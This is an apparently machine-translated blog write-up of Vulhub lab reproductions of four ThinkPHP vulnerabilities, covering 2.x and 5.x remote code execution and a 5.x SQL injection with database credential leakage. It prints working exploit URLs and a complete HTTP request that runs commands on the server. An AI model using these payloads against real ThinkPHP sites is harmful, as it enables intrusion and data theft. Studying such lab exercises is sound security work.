当前位置:网站首页>Vulhub vulnerability recurrence 68_ ThinkPHP
Vulhub vulnerability recurrence 68_ ThinkPHP
2022-07-06 05:17:00 【Revenge_ scan】
One 、 ThinkPHP 2.x Arbitrary code execution vulnerability
Vulnerability Details
ThinkPHP 2.x In the version , Use `preg_replace` Of `/e` Pattern matching routing :
```php
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
```
Causes the user's input parameters to be inserted into double quotation marks , Cause Arbitrary Code Execution Vulnerability .
ThinkPHP 3.0 Version because Lite This vulnerability is not fixed in mode , There is also this loophole .
Environment building
shooting range :192.168.4.10_ubuntu
Execute the following command to start ThinkPHP 2.1 Of Demo application :
#docker-compose up -d
After the environment starts , visit `http://your-ip:8080/` You can view the default page .
Loophole recurrence
Direct access `http://your-ip:8080/index.php?s=/index/index/name/$%[email protected]()%7D` Can execute `phpinfo()`:
Two 、 ThinkPHP5 5.0.23 Remote code execution vulnerability
Vulnerability Details
ThinkPHP It is a widely used PHP Development framework . Its 5.0.23 In previous versions , obtain method The method name is not handled correctly in the method of , Causes an attacker to call Request Class any method and construct the utilization chain , This leads to a Remote Code Execution Vulnerability .
Reference link :
-https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
Vulnerability environment
Execute the following command to start a default thinkphp 5.0.23 Environmental Science :
#docker-compose up -d
After the environment starts , visit `http://your-ip:8080` You can see the default ThinkPHP Launch page .
Loophole recurrence
Send packet :
```
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
```
Successful execution `id` command :
3、 ... and 、 ThinkPHP5 5.0.22/5.1.29 Remote code execution vulnerability
Vulnerability Details
ThinkPHP It is a widely used PHP Development framework . Its version 5 in , Because the controller name was not handled correctly , This results in the situation that the website does not turn on forced routing ( By default ) Any method can be executed , This leads to a remote command execution vulnerability .
Reference link :
- http://www.thinkphp.cn/topic/60400.html
- http://www.thinkphp.cn/topic/60390.html
- https://xz.aliyun.com/t/3570
Vulnerability environment
function ThinkPHP 5.0.20 edition :
#docker-compose up -d
After the environment starts , visit `http://your-ip:8080` You can see ThinkPHP Default startup page .
Loophole recurrence
Direct access `http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`, Can execute phpinfo:
Four 、 ThinkPHP5 SQL Inject holes && Leakage of sensitive information
Running environment
#docker-compose up -d
After starting , visit `http://your-ip/index.php?ids[]=1&ids[]=2`, You can see that the user name is displayed , It indicates that the environment runs successfully .
Loophole principle
Explanation of vulnerability principle :
- https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
- https://xz.aliyun.com/t/125
Exploit
visit `http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`, The information was successfully revealed :
Of course , This is a chicken rib SQL Inject holes . But through DEBUG page , We found the account number of the database 、 password :
This is another sensitive information disclosure vulnerability .
边栏推荐
- The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
- Sliding window problem review
- Oracle deletes duplicate data, leaving only one
- [untitled]
- Leetcode 186 Flip the word II in the string (2022.07.05)
- Fiddler installed the certificate, or prompted that the certificate is invalid
- Can the feelings of Xi'an version of "Coca Cola" and Bingfeng beverage rush for IPO continue?
- Nacos TC setup of highly available Seata (02)
- Some common skills on unity inspector are generally used for editor extension or others
- Lepton 无损压缩原理及性能分析
猜你喜欢
Yolov5 tensorrt acceleration
Nacos TC setup of highly available Seata (02)
GAMES202-WebGL中shader的編譯和連接(了解向)
Pointer classic written test questions
Fluent implements a loadingbutton with loading animation
Imperial cms7.5 imitation "D9 download station" software application download website source code
F12 solve the problem that web pages cannot be copied
idea一键导包
Acwing week 58
Ora-01779: the column corresponding to the non key value saving table cannot be modified
随机推荐
从0到1建设智能灰度数据体系:以vivo游戏中心为例
Questions d'examen écrit classiques du pointeur
[untitled]
Using stopwatch to count code time
Select knowledge points of structure
HAC集群修改管理员用户密码
【LGR-109】洛谷 5 月月赛 II & Windy Round 6
EditorUtility.SetDirty在Untiy中的作用以及应用
Some common skills on unity inspector are generally used for editor extension or others
[effective Objective-C] - memory management
TCP three handshakes you need to know
Can the feelings of Xi'an version of "Coca Cola" and Bingfeng beverage rush for IPO continue?
UCF(2022暑期团队赛一)
Collection + interview questions
注释、接续、转义等符号
Modbus protocol communication exception
Postman pre script - global variables and environment variables
[noip2008 improvement group] stupid monkey
Mysql高级篇学习总结9:创建索引、删除索引、降序索引、隐藏索引
Easy to understand I2C protocol